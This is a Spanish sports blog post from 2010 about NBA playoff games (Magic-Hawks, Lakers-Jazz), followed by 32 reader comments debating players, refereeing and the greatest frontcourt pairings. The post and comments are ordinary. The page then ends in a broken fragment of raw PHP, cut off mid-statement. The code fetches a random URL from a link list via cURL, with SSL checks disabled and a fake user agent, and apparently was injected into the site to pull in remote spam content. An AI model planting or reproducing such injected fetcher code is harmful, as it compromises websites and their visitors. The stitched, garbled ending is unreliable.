Playoffs 04/05/2010: Halcones en peligro de extinción

05 de May de 2010 por TheDeerHunter

dwightjoshdown

Por TheDeerHunter y MagicJohnson32

Dijimos que la eliminatoria Magic-Hawks se decidiría desde el duelo Horford vs Howard. Si esta premisa resulta cierta, y por lo que vimos anoche, los halcones ya pueden ir preparando las maletas para irse de vacaciones. En realidad, tras la masacre no habrían muchos motivos para pensar en otra cosa que no sea que termine este mal trago cuanto antes, para poder así olvidarlo, escondido en alguna playa paradisíaca donde estos tíos acostumbran a disfrutar sus vacaciones, rodeados  siempre por la(s) preciosidad(es) de turno. A estas alturas, hace falta mucha fuerza mental para superar una paliza de 43 puntos en el primer partido de la serie, cuando se suponía que más posibilidades tenían de sorprender al rival.

dwighhorfHubo pocos motivos para agarrarse a la esperanza. Los pilares del equipo se resquebrajaron al unísono. Tras un primer cuarto igualado llegó el naufragio, con un parcial de nada menos que 60 a 21 en dos cuartos. Al Horford: 1 de 7; Joe Johnson: 4-11, 5 pérdidas y nulo desde la línea de 3; Crawford 1-11 e igual de nulo que su compañero más un -35 de parcial en su presencia; Bibby 1-5 y sólo 3 asistencias; Josh Smith 3 rebotes en 23 minutos de juego… Casi podemos decir que el mejor fue Pachulia.

Por los Magic, en cambio, salió y produjo hasta el chico de las toallas, que en ese equipo también tiene calidad. Para que os hagáis una idea, los peores del equipo fueron: Anthony Johnson – 2 puntos, 2 asistencias en 5 minutos; Brandon Bass – 6 puntos, 3 rebotes en 6 minutos; Ryan Anderson – 4 ptos, 6 rebotes, 3 tapones en 13 minutos… Estamos hablando de los jugadores 10º, 11º y 12º de la rotación. Todos los demás, mejor o mucho mejor. La diferencia es abismal.

Pese a todo, la eliminatoria sólo ha empezado y palizas peores va a ser difícil que se lleven…

paulokbEn el Staples se vio más igualdad, cortesía de unos Lakers que volvieron a tumbar a los Jazz a su manera: dejando escapar buena parte de una gran renta, 15 puntos que llegaron a ser sólo 4 a menos de 5 minutos para el final, y asegurando el triunfo en el tramo final gracias a la defensa interior y a los puntos de Bryant. El #24 alcanzó la treintena por tercer partido consecutivo (22 en la segunda mitad) y dio claras muestras de que su recuperación es un hecho con su actividad cerca del aro (3 tapones).

Aunque posiblemente la clave estuvo en la superioridad de los angelinos en el frontcourt. Gasol -de nuevo brillante-, Bynum y Odom firmaron dobles-dobles y acumularon 50 puntos, 44 rebotes y 9 tapones, en lo que fue una bonita batalla ante Boozer y Millsap, autores de 46 puntos y 23 rebotes.

Esta vez falló Deron Williams, correcto en la dirección pero con muchos problemas para anotar. Miles y Matthews lo compensaron en parte y resultaron clave en el esfuerzo de su equipo para equilibrar el marcador en el último cuarto. Entonces, 9 puntos de Bryant en los últimos 4:40 sellaron el 2-0 en una eliminatoria que no vivirá su tercer asalto hasta el próximo sábado.

PREMIOS

MVP: De momento los jugadores de los Lakers se están encontrando la mar de cómodos. Kobe, 30 puntos y 8 asistencias; Gasol, 22 puntos y 15 rebotes; Bynum, 17 puntos, 14 rebotes y 4 tapones. Y en Orlando, Dwight Howard se kobedunkpuso las botas a costa de los Hawks, 21 puntos, 12 rebotes y 5 tapones en 29 minutitos.

Rookie: Ahí sigue Wesley Matthews jugando buenos partidos. 14 puntos, 5 rebotes y 3 robos.

Sorpresa: Desde la marcha de Ronnie Brewer, CJ Miles se ha consolidado en el puesto de titular en los Jazz con relativo éxito. Anoche fue de los destacados de su equipo con 20 puntos, 4 rebotes y 6 asistencias.

Decepción: El mejor jugador de los Hawks ha sido Zaza Pachulia. No hace falta decir nada más… (que diría Schuster)

Esfuerzo en vano: Ante el mal partido de Deron, esta vez han sido Carlos Boozer y Paul Millsap los que han tirado del carro de Utah. Entre ambos, 46 puntos y 23 rebotes.

Y MAÑANA…

Un solo partido, el segundo asalto del Suns-Spurs. Dieron primero los de Nash, pero mal harán si piensan que tienen mucho ganado ante Duncan, Ginobili y compañía.

Comenta

32 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Por lo que se ha comentado… no sé si me dejo llevar por la “prepotencia” propia del club de mis amores, pero hasta el momento la eliminatoria contra Utah me está pareciendo facilísima. Diría que hasta un poco decepcionante.
    No digo que esperaba otra cosa que un 2-0… y cuantitativamente han estado cerca de evitarlo. Su problema es que mi sensación es que en cuanto Pau y Kobe se lo han propuesto han hecho literalmente lo que les ha dado la gana (ya sea atacar o defender) Y si hubier hecho falta más hubieran logrado más. Nada que ver con la eliminatoria contra Thunder.
    Ellos han atacado bien, son muy buenos, pero es que en dos partidos les he visto absolutamente incapaces de minimizar a la parejita, y eso sólo significa una cosa. Boozer con lo bien que está jugando lo veo siempre a punto de echarse a llorar de la desesperación.
    El duelo Sloan-Jackson también se lo ha llevado el nuestro. Anoche, a pesar del resultado y lo que queráis, vi un Sloan completamente impotente. Eso no lo vi ni contra Jordan, que en principio lo tenía más difícil.

    Sólo les faltaba que Bynum y Odom empiecen a jugar bien (que bien le vino a Odom el último… y qué buena forma ha encontrado Phil Jackson para que se repartan los minutos) y que Fisher y Artest mantengan su nivel. En qué mala hora (para él) Deron Williams decidió picar a Ron Ron. Por cierto… qué pedazo de jugador hay escondido en el cuerpo de Bynum. A ver si alguien logra enseñar a jugar a baloncesto a ese chico y tiene mejor suerte con las lesiones…

    Única esperanza de Utah, que vuelva Kirilenko, que esté mejor de lo que se espera y que Kobe no esté tan bien como ha parecido estos días. Eso y además llevar el choque al nivel físico/duro que sólo les van a dejar utilizar en Salt Lake. Y con todo veo a estos Lakers muy preparados para meterse en la trinchera… a diferencia de otros años.

    Mi impresión es que está más cerca el 4-0 que el 4-2 que pronostiqué. Esto marcha, aunque tampoco dudo de que se complique (ójala se complique un poco, de hecho)

      Citar

  2. rojorob dice:
    #2

    ¿De dónde era el árbitro?

      Citar

  3. Love Denise dice:
    #3

    Bueno, tanto Pachulia como Teague hicieron sus números en el último cuarto, cuando ya perdían por 30.
    Howard hizo lo que le dio la gana, y el aro de los Hawks fue machacado tantas veces como si se tratase de un All.Star Game.
    Es dificil elegir quien fue el peor de los Hawks, aunque yo eligiría a Bibby, un auténtico coladero en defensa, totalmente apático.
    Pero no hay que confiarse, supongo que los hawks tendrán orgullo y el siguiente partido saldrán a darlo todo.

      Citar

  4. pcerezo dice:
    #4

    Yo tengo la sensación que ante la falta de un cinco dominante como lo era el O’Neal de principios de decada, Gasol se convierte en fundamental en el sentido de que no hay ningún jugador más fuerte que defender que él (a la espera de Howard, estoy convencido que Orlando llega a la final, tengo un pálpito) y su inteligencia en todos los sentidos hacen que se conviertan en el jugador clave de lo que queda de competición. Tengo la sensación de que Bryant y Odom solo pueden ir a mejor y que eso es muy malo para los rivales.

    En cuanto a Atlanta la clave es la reacción en el segundo partido ya que va a marcar si les pueden poner en aprietos o se van a casa rápido (que será lo que hagan al final de la serie).

    Pablo

      Citar

  5. TheDeerHunter dice:
    #5

    Es que si este equipo encima tuviera un Shaq (quitando a Bynum) ya te digo que sería la mejor plantilla de la historia sin ninguna duda.
    Bynum no es un Shaq, pero estando mal ha destrozado los juegos interiores de Thunder y Jazz de momento (aunque tampoco sean la bomba) y estando fatal el año pasado le dió algunos minutos a Pau que fueron clave (aunque pocos)

    Le ves hacer ciertas cosas al chaval y te das cuenta que el talento está ahí, latente… y que el físico (quitando lesiones) lo tiene. Su problema, además de su fragilidad es el conocimiento y la lectura del juego. Yo creo que todo eso puede aprenderse (además que tiene buenos maestros al lado)
    Lo dicho, si por una de esas en 3 años no se lesiona, la pareja con Gasol puede llegar a ser mítica.

    Y Orlando tiene pinta de campeón, muy cierto, pero con Pau, Kobe, Artest y Odom a su nivel… para mí el anillo tiene dueño claro. Me quedo antes con los Lakers a su nivel que con Cleveland o Orlando a su nivel. (más miedo me dan los Celtics a su nivel)

      Citar

  6. TheDeerHunter dice:
    #6

    Lanzo una pregunta… ¿cual es la mejor pareja interior de la historia?

      Citar

  7. rojorob dice:
    #7

    Romay-F. Martín.

      Citar

  8. MagicJohnson32 dice:
    #8

    No hay duda: la pareja interior titular de los Lakers 05-06, Chris Mihm y Kwame Brown (cuando Mihm se lesionó, entonces entró Brian Cook, que también valdría).

      Citar

  9. kantonyo dice:
    #9

    Hoy no he visto los partidos, solo los resumenes, pero flipo con el palizón de Orlando a Atlanta. Veremos si los Hawks han llegado cansados a la eliminatoria, que no me pareceria ilogico, ya que los 5 titulares tienen demasiado peso en este equipo, o si simplemente Atlanta no da más de si, como vimos contra los debiles Bucks, que no son nada y les pusieron contra las cuerdas.

      Citar

  10. pcerezo dice:
    #10

    Sampson-Olajuwon?

      Citar

  11. portu dice:
    #11

    No ví el partido entero pero el 1º de la serie LAL-UTA no fue en absoluto fácil para los Lakers. Además, en ese partido en el último cuarto hay unas cuantas “faltitas” (una desde el suelo q le pitan al defensor de Bryant absolutamente absurda) q permiten la remontada de los Lakers cuando Utah estaba por delante y no faltaba demasiado tiempo, aparte de algunas jugadas muy buenas, claro, pero lo de las faltas cuando llevaban 1-13 en tiros en ese cuarto fue lo q les permitió desatascarse en ataque. El partido de anoche no lo ví, quizás sí fue más sencillo.

      Citar

  12. MagicJohnson32 dice:
    #12

    Shaquille & Karl Malone, pfff…

      Citar

  13. TheDeerHunter dice:
    #13

    La falta que dices será todo lo absurda que quieras, pero si un tío que está en el suelo tirado (porque previamente se ha tirado descaradamente para simular una falta en ataque que no existe) se levanta con toda la intención de tocar al tirador (sin ninguna posibilidad de defenderle) es falta como un piano de gorda.

    A Kobe y a Pau les hicieron faltas porque no tenían ninguna otra manera de defenderles… porque en ellos lo del 1-13, pues como que de eso nada. Ambos anotaron en todo momento lo que les dió la gana… y aquí hablo literalmente. En el instante que comentas con 4 abajo salieron los dos y lo resolvieron en un abrir y cerrar de ojos… no hubo ni tiempo para que nadie del público se acojonara.

    Supongo que también sería por culpa de los árbitros el capazo de tapones que se llevó Utah en los minutos finales y lo de noche que se les hizo cuando los Lakers se pusieron a defender “un poquito”…
    En fin, que yo no vi peligrar el partido ni con 4 abajo… ni nada de nada. Los Jazz han estado los dos partidos en manos de L.A. incluso diría que jugando al límite de su nivel ofensivo.

    Los dos partidos han sido de guante blanco… a decir verdad demasiado para los intereses de Utah. Supongo que ni Sloan insinuaría lo contrario. De hecho, si yo fuera de los Utah Jazz trataría de llevar el partido a otro terreno en Salt Lake… y sería un terreno ni demasido vistoso ni demasiado limpio.

      Citar

  14. sergio dice:
    #14

    Para mi, la mejor pareja interior, sin tener demasiadas dudas fue la Duncan-Robinson de 1999. Aunque quizas me dejo llevar porque sean dos de mis jugadores favoritos de la historia. El Shaq-Malone no compaginaba demasiado bien.. pero por nombres deberia serlo.

    Creo que la superioridad de los Magic en la serie es debida en gran parte a que el sistema de juego de los Hawks es bastante beneficioso para la forma de jugar de los de Florida. Desde un punto de vista tactico, la adaptacion a los sistemas contrarios decide muuuuuchas eliminatorias a estas alturas… Por eso los equipos de Popovich, Jackson, Rivers y Van Gundy siempre van a mas en los enfrentamientos directos.

      Citar

  15. TheDeerHunter dice:
    #15

    se me van a quitar las ganas de lanzar preguntas
    parece que Sergio siempre me lee directamente de la cabeza

      Citar

  16. sergio dice:
    #16

    Jaja.. es que piensas lo mismo Deer?

    Tampoco es que haya habido muchas parejas de grandes jugadores altos que hayan salido triunfantes en la temporada. Tambien se me ocurrio la de Russel-Heinsohn, pero considero que estaban muy ayudados por otros como Sam Jones o Bob Cousy. Sin embargo, la pareja de los Spurs se puede decir que lo hacian todo ellos…

    Ah! y no se me olvida la frustrada superpareja Baylor-Chamberlain que se fastidio por las lesiones del primero. Creo que el West-Baylor-Chamberlain pudo ser el gran “Big-Three” de la historia…

      Citar

  17. MagicJohnson32 dice:
    #17

    Hablando de interiores, ojito al párrafo de Enric Corbella hoy en su crónica del Lakers-Jazz:

    ‘Engañapúblicos’ Bynum
    Por su parte Andrew Bynum volvió a lograr buenos números, 17 puntos y 14 rebotes, pero su rendimiento es engañoso. Con él en pista el nivel defensivo de los Lakers baja, está lento, sólo sabe jugar los dos contra dos para jugársela él, no asiste… Eso sí, cuando recibe en la pintura es casi un mate seguro. Los Lakes juegan mucho mejor cuando está Odom en pista.

      Citar

  18. pcerezo dice:
    #18

    Yo creo que la pareja Sampson-Olajuwon también era muy buena, aunque se frustó por las lesiones del primero.

      Citar

  19. kantonyo dice:
    #19

    Otras parejas de interiores que no estuvieron nada mal:

    Elvin Hayes-Moses Malone en Houston 1981, en el ocaso de Hayes
    S. O’Neal- Horance Grant en Orlando 1996.
    Ralph Sampson – Olajuwon en Houston 1984-1987
    Olajuwon- Othis Thorpe en Houston 1988-1994
    Webber – Divac en Sacramento 1998-2004

      Citar

  20. TheDeerHunter dice:
    #20

    No estoy para nada de acuerdo con Enric Corbella.
    Bynum no engaña a nadie… quizás sí al que afirme de él que “mate seguro”, porque lo que se dice mates… ni tantos ni tan seguro.
    Es cierto que está lento, que no asiste y que sólo sabe jugárselas él (de ahí lo que decía de mejorar su conocimiento y lectura del juego) pero no es menos cierto que su presencia en la pintura es descomunal… sin ir más lejos recuerdo muy bien un taponazo a Deron Williams con el partido en el filo de la navaja (a 5’37” del final en un lanzamiento para ponerse a 4, para ser más exáctos)
    Lo más engañoso de todo es mencionar a Odom en este asunto… porque sí es cierto que la defensa con Odom ha sido impresionante en esos minutos finales de los dos primeros partidos. Esto también es porque Odom de repente se ha puesto a jugar, justo a partir de los últimos 5 minutos del primer partido, cuando antes era un auténtico coladero (y cuando digo antes me refiero a prácticamente toda la regular y la primera ronda contra Thunder) Antes de esto no hay comparación posible entre los rebotes que cedía Bynum y los que cedía Odom, como tampoco de la defensa de uno y de otro.

    Lo que ha dado Bynum a los Lakers hasta hoy en playoffs es muy mejorable… pero ahora mismo no entiendo a qué vienen esas críticas cuando ha sido de lo destacado de la primera ronda y buena parte de ésta.

    Y por cierto, de lo que decía antes Portu de los árbitros en el primer partido… desde que Utah se pone 3 puntos por encima los Lakers lanzan la impresionante cantidad de 7 tiros libros. 4 de ellos con el partido decidido a su favor con faltas intencionadas para cortar el tiempo.
    Diría que esos 3 puntos producto de un supuesto (imaginario) favor de los árbitros no pueden ser la causa de que se desatascara mágicamente el ataque.

      Citar

  21. TheDeerHunter dice:
    #21

    ah, ojo…
    pues creo que la mejor podría ser la de Hayes-Unseld del título de los Bullets
    gracias, kantonyo

      Citar

  22. MagicJohnson32 dice:
    #22

    Barkley-Mo Malone, en los Sixers del 86.

    Y Barkley-Olajuwon, ya abueletes pero dando mucha guerra, en el 97.

    ¿Algún otro buen pívot con el que coincidió Barkley? Mahorn es lo mejor que se me ocurre, jeje.

      Citar

  23. Txusma dice:
    #23

    Duncan y cualquier otro…

      Citar

  24. MagicJohnson32 dice:
    #24

    Duncan y… yo xD

      Citar

  25. max dice:
    #25

    Bill Laimbeer-Dennis Rodman. No han sido los mejores pero ayudaron mucho a ganar los dos anillos de los Pistons en 89-90. Los Bad Boys, que grandes recuerdos…..

      Citar

  26. sergio dice:
    #26

    Por cierto, hablando de pivots… he empezado una serie de articulos individuales sobre los grandes jugadores de la historia, basandome en las listas que se hicieron en el blog para elegir los mejores jugadores por posicion de la historia. He empezado por los pivots y ya tengo escritos los de Chamberlain, Russell, Abdul-Jabbar y Olajuwon. Si alguien se animase con alguno solo teneis que decirlo ok? No me importa hacerlos solo, pero se agradeceria otro modo de contar las cosas que no sea el mio…

      Citar

  27. portu dice:
    #27

    La falta q comentaba como absurda lo es pq tras tirarse al suelo el defensor intentando provocar falta en ataque, luego simplemente intenta levantarse, no hay ningún contacto sobre Bryant como para q le piten falta a favor… yo creo q cuando no te tocan no se debe pitar falta. Si tú no viste peligrar el partido para LA en aquellos momentos debes tener nervios de acero, je,je, pero la cosa estaba apretadilla.

      Citar

  28. Viva_Dirk dice:
    #28

    Sergio, a mi me gustaría hacer alguno, no creo que mis preferencias estén entre los siguientes, pero de todos modos te aviso.

    Yo iba a nombrar a Hayes-Unseld, ya lo ha hecho Deer pero para mi si podria ser la mejor. Y una que no se ha nombrado y de la que lo he visto ni un minuto de juego, Bob Petit-Cliff Hagan.

      Citar

  29. sergio dice:
    #29

    Tu diras Dirk, ya sabes los pivots que siguen en la lista… puedes coger el que quieras. No es algo mio, soy yo el que participa en vuestro blog, no al reves.

      Citar

  30. TheDeerHunter dice:
    #30

    Bueno Portu, lo de la falta si tuviera imágenes de esa jugada supongo que saldríamos de dudas… a mí me pareció falta clara.
    De lo de los nervios de acero… supongo que uno se acostumbra a todo, y después de algunos acongojos más grandes que me han dado los Lakers el perder de 4 cuando quedan 5 minutos, que salgan Kobe y Pau y la desventaja no dure ni medio minuto no me afecta tanto el desasosiego.
    Distinto hubiera sido que se perdiera de 4 faltando un minuto… y aún así, todavía hubiera tenido bastantes esperanzas de victoria.

      Citar

  31. TheDeerHunter dice:
    #31

    Meditando un poco mi última respuesta quiero hacer un matiz.
    Sí lo pasé un poco peor en algunos partidos contra los Thunder a pesar de que en alguno de ellos el marcador no fue tan estrecho.
    Esto es porque en los Thunder vi ciertos aspectos más incontrolables que en el caso de Utah y ciertas virtudes que podían marcar la diferencia. Los Jazz están atacando muy bien, pero si no son capaces de controlar a Kobe están muertos. Y en este caso ni a Kobe ni a Gasol… ni siquiera a los otros. Por eso estoy tranquilo. Un intercambio de golpes contra los Lakers suele ser un suicidio.

      Citar

  32. MagicJohnson32 dice:
    #32

    La jugada es ésta: http://www.youtube.com/watch?v=2Zid8VywyGw

    Los árbitros señalan el contacto con el brazo.

    En cualquier caso, el partido no se decidió por ese punto.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>